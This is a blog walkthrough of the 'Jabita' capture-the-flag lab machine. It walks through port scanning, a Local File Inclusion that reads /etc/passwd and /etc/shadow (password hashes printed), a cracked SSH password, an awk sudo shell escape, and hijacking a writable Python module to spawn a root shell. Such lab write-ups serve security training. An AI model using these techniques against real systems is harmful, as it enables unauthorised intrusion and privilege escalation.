<!DOCTYPE html>
<html lang="en-US"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Jabita - Walkthrough | My Blog</title>
<meta property="og:title" content="Jabita - Walkthrough | My Blog" />
<meta name="twitter:title" content="Jabita - Walkthrough | My Blog" />
<meta itemprop="name" content="Jabita - Walkthrough | My Blog" />
<meta name="application-name" content="Jabita - Walkthrough | My Blog" />
<meta property="og:site_name" content="My Blog" />

<meta name="description" content="Walkthrough for the Jabita machine.">
<meta itemprop="description" content="Walkthrough for the Jabita machine." />
<meta property="og:description" content="Walkthrough for the Jabita machine." />
<meta name="twitter:description" content="Walkthrough for the Jabita machine." />

<meta property="og:locale" content="en-US" />
<meta name="language" content="en-US" />

  <link rel="alternate" hreflang="en" href="https://nvru.github.io/posts/hmv/jabita/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2026-07-07T00:00:00Z />
    <meta property="article:published_time" content=2026-07-07T00:00:00Z />
    <meta property="og:url" content="https://nvru.github.io/posts/hmv/jabita/" />

    
    <meta property="og:article:author" content="null void root" />
    <meta property="article:author" content="null void root" />
    <meta name="author" content="null void root" />
    
    

    

    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "Article",
        "headline": "Jabita - Walkthrough",
        "author": {
        "@type": "Person",
        "name": "null void root"
        },
        "datePublished": "2026-07-07",
        "description": "Walkthrough for the Jabita machine.",
        "wordCount":  504 ,
        "mainEntityOfPage": "https://nvru.github.io/posts/hmv/jabita/",
        "dateModified": "2026-07-07",
        "image": {
        "@type": "ImageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "My Blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.163.3">

    
    <meta property="og:url" content="https://nvru.github.io/posts/hmv/jabita/">
	<meta property="og:site_name" content="My Blog">
	<meta property="og:title" content="Jabita - Walkthrough">
	<meta property="og:description" content="Walkthrough for the Jabita machine.">
	<meta property="og:locale" content="en_US">
	<meta property="og:type" content="article">
		<meta property="article:section" content="posts">
		<meta property="article:published_time" content="2026-07-07T00:00:00+00:00">
		<meta property="article:modified_time" content="2026-07-07T00:00:00+00:00">
		<meta property="article:tag" content="Ctf">
		<meta property="article:tag" content="Walkthrough">
		<meta property="article:tag" content="Linux">
		<meta property="article:tag" content="Apache">
		<meta property="article:tag" content="Lfi">
		<meta property="article:tag" content="Ssh">


    
    
	<meta name="twitter:card" content="summary">
	<meta name="twitter:title" content="Jabita - Walkthrough">
	<meta name="twitter:description" content="Walkthrough for the Jabita machine.">


    

    <link rel="canonical" href="https://nvru.github.io/posts/hmv/jabita/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://nvru.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://nvru.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Jabita - Walkthrough</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2026-07-07T00:00:00&#43;00:00" itemprop="datePublished"> 7 Jul 2026 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#overview">Overview</a></li>
    <li><a href="#port-scanning">Port Scanning</a>
      <ul>
        <li><a href="#rustscan">RustScan</a></li>
        <li><a href="#results">Results</a></li>
        <li><a href="#nmap">Nmap</a></li>
        <li><a href="#results-1">Results</a></li>
      </ul>
    </li>
    <li><a href="#web-enumeration">Web Enumeration</a>
      <ul>
        <li><a href="#directory-enumeration">Directory Enumeration</a></li>
        <li><a href="#reading-sensitive-files">Reading Sensitive Files</a></li>
      </ul>
    </li>
    <li><a href="#initial-access">Initial Access</a></li>
    <li><a href="#privilege-escalation">Privilege Escalation</a>
      <ul>
        <li><a href="#jack--jaba">jack → jaba</a></li>
        <li><a href="#jaba--root">jaba → root</a></li>
      </ul>
    </li>
    <li><a href="#credentials">Credentials</a></li>
    <li><a href="#flags">Flags</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h2 id="overview">Overview</h2>
<ul>
<li><strong>Attacker IP:</strong> <code>10.10.10.2</code></li>
<li><strong>Target Machine IP:</strong> <code>10.10.10.15</code></li>
</ul>
<p>The objective was to enumerate the target, identify exposed services, gain initial access through a Local File Inclusion vulnerability, and escalate privileges through sudo misconfigurations and Python library hijacking.</p>
<p><img src="/images/hmv/jabita/vm.png" alt="Machine information"></p>
<hr>
<h2 id="port-scanning">Port Scanning</h2>
<h3 id="rustscan">RustScan</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rustscan -a 10.10.10.15 -- -A -oA nmap/rust
</span></span></code></pre></div><h3 id="results">Results</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Open 10.10.10.15:22
</span></span><span style="display:flex;"><span>Open 10.10.10.15:80
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT   STATE SERVICE
</span></span><span style="display:flex;"><span>22/tcp open  ssh
</span></span><span style="display:flex;"><span>80/tcp open  http
</span></span></code></pre></div><hr>
<h3 id="nmap">Nmap</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -sSCV -A -p22,80 -oA nmap/22_80 --min-rate<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> 10.10.10.15
</span></span></code></pre></div><h3 id="results-1">Results</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>PORT   STATE SERVICE VERSION
</span></span><span style="display:flex;"><span>22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Service Info:
</span></span><span style="display:flex;"><span>OS: Linux
</span></span></code></pre></div><p>Only SSH and HTTP were exposed, so web enumeration was the obvious next step.</p>
<hr>
<h2 id="web-enumeration">Web Enumeration</h2>
<p>Browsing to port 80 revealed a simple webpage with no immediately useful information.</p>
<p><img src="/images/hmv/jabita/http.png" alt="HTTP homepage"></p>
<p>Inspecting the page source also revealed nothing interesting.</p>
<p>I also checked for <code>robots.txt</code>, but no useful entries were found.</p>
<p><img src="/images/hmv/jabita/no_robots.png" alt="No robots.txt"></p>
<hr>
<h3 id="directory-enumeration">Directory Enumeration</h3>
<p>Since the default page did not provide any useful information, I performed directory brute forcing.</p>
<p>A hidden directory named:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>building
</span></span></code></pre></div><p>was discovered.</p>
<p><img src="/images/hmv/jabita/dir_brute_force.png" alt="Directory brute force"></p>
<p>Inspecting the source code revealed a parameter that appeared to load files from the server.</p>
<p>The first thing to test was a Local File Inclusion vulnerability.</p>
<p>Reference:</p>
<ul>
<li><a href="https://hacktricks.wiki/en/pentesting-web/file-inclusion/index.html">https://hacktricks.wiki/en/pentesting-web/file-inclusion/index.html</a></li>
</ul>
<p><img src="/images/hmv/jabita/building_src.png" alt="Source code"></p>
<p>Testing the parameter with <code>/etc/passwd</code> confirmed the vulnerability.</p>
<p><img src="/images/hmv/jabita/suc_lfi.png" alt="Successful LFI"></p>
<p>The output revealed two local users:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>jack
</span></span><span style="display:flex;"><span>jaba
</span></span></code></pre></div><p>It also revealed that LXD was installed on the machine.</p>
<hr>
<h3 id="reading-sensitive-files">Reading Sensitive Files</h3>
<p>After confirming the LFI vulnerability, I continued enumerating sensitive files.</p>
<p>Attempts to read files from user home directories, such as:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>.bash_history
</span></span><span style="display:flex;"><span>.bashrc
</span></span></code></pre></div><p>were unsuccessful due to permission restrictions.</p>
<p>However, <code>/etc/shadow</code> was readable through the vulnerable parameter.</p>
<p><img src="/images/hmv/jabita/shadow_lfi.png" alt="Shadow via LFI"></p>
<p>The password hashes for the local users were exposed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>root:$y$j9T$avXO7BCR5/iCNmeaGmMSZ0$gD9m7w9/zzi1iC9XoaomnTHTp0vde7smQL1eYJ1V3u1
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1
</span></span></code></pre></div><p>I attempted to crack the hashes using John the Ripper.</p>
<p>The password for <code>jack</code> was successfully recovered.</p>
<p><img src="/images/hmv/jabita/john_jack.png" alt="John cracking"></p>
<hr>
<h2 id="initial-access">Initial Access</h2>
<p>Using the recovered credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Username: jack
</span></span><span style="display:flex;"><span>Password: joaninha
</span></span></code></pre></div><p>SSH access was successful.</p>
<p><img src="/images/hmv/jabita/suc_ssh_jack.png" alt="SSH as jack"></p>
<hr>
<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="jack--jaba">jack → jaba</h3>
<p>The first thing I checked was sudo permissions.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo -l
</span></span></code></pre></div><p><img src="/images/hmv/jabita/sudo_l_jack.png" alt="sudo permissions"></p>
<p>The user <code>jack</code> could execute <code>awk</code> as <code>jaba</code> without supplying a password.</p>
<p>Attempts to access <code>jaba</code>&rsquo;s home directory were unsuccessful because of permission restrictions.</p>
<p><img src="/images/hmv/jabita/no_perm_home.png" alt="No permission"></p>
<p>Using GTFOBins and the awk documentation, I found that <code>awk</code> can execute arbitrary system commands.</p>
<p>The following command spawned a shell as <code>jaba</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo -u jaba /usr/bin/awk <span style="color:#e6db74">&#39;BEGIN {system(&#34;/bin/sh&#34;)}&#39;</span>
</span></span></code></pre></div><p><img src="/images/hmv/jabita/exp_awk_sudo_jaba.png" alt="AWK exploit"></p>
<hr>
<h3 id="jaba--root">jaba → root</h3>
<p>After switching to <code>jaba</code>, I found the user flag and a Python history file.</p>
<p>Reading <code>.python_history</code> revealed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>chmod u+s /bin/bash
</span></span></code></pre></div><p><img src="/images/hmv/jabita/flag_py_hist.png" alt="Python history"></p>
<p>This suggested that a SUID binary might have been created.</p>
<p>I searched for SUID files:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>find / -perm -4000 -type f 2&gt;/dev/null
</span></span></code></pre></div><p>However, no unusual SUID binaries were found.</p>
<p><img src="/images/hmv/jabita/find_no_suid.png" alt="No SUID"></p>
<p>Running <code>sudo -l</code> again revealed a more interesting entry.</p>
<p><img src="/images/hmv/jabita/sudo_l_jaba.png" alt="sudo -l jaba"></p>
<p>The user could execute:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>/usr/bin/python3 /usr/bin/clean.py
</span></span></code></pre></div><p>as root.</p>
<hr>
<h4 id="python-library-hijacking">Python Library Hijacking</h4>
<p>Inspecting <code>clean.py</code> showed that it imported a custom module:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> wild
</span></span></code></pre></div><p>I searched for the module location:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>find / -type f -name wild.py -ls 2&gt;/dev/null
</span></span></code></pre></div><p>The discovered <code>wild.py</code> file was writable by all users.</p>
<p>I replaced its contents with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> os
</span></span><span style="display:flex;"><span>os<span style="color:#f92672">.</span>system(<span style="color:#e6db74">&#34;bash -i&#34;</span>)
</span></span></code></pre></div><p>Running the allowed sudo command executed the modified module as root.</p>
<p><img src="/images/hmv/jabita/su_root.png" alt="Root shell"></p>
<hr>
<h2 id="credentials">Credentials</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>jack:joaninha
</span></span></code></pre></div><hr>
<h2 id="flags">Flags</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>user:2e0942f09699435811c1be613cbc7a39
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>root:f4bb4cce1d4ed06fc77ad84ccf70d3fe
</span></span></code></pre></div>
            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://codeberg.org/vru" target="_blank" rel="noopener noreferrer me"
    title="Codeberg">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
 <g transform="translate(2.4, 2.4) scale(0.8)">
  <path d="M11.955.49A12 12 0 0 0 0 12.49a12 12 0 0 0 1.832 6.373L11.838 5.928a.187.14 0 0 1 .324 0l10.006 12.935A12 12 0 0 0 24 12.49a12 12 0 0 0-12-12 12 12 0 0 0-.045 0zm.375 6.467 4.416 16.553a12 12 0 0 0 5.137-4.213z"/>
 </g>
</svg>
</a>
<a href="https://github.com/nvru" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://linkedin.com/in/abdullah-keitut-880a09385" target="_blank" rel="noopener noreferrer me"
    title="Linkedin">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path>
    <rect x="2" y="9" width="4" height="12"></rect>
    <circle cx="4" cy="4" r="2"></circle>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2026 null void root.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    






    
    <script src="https://nvru.github.io/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
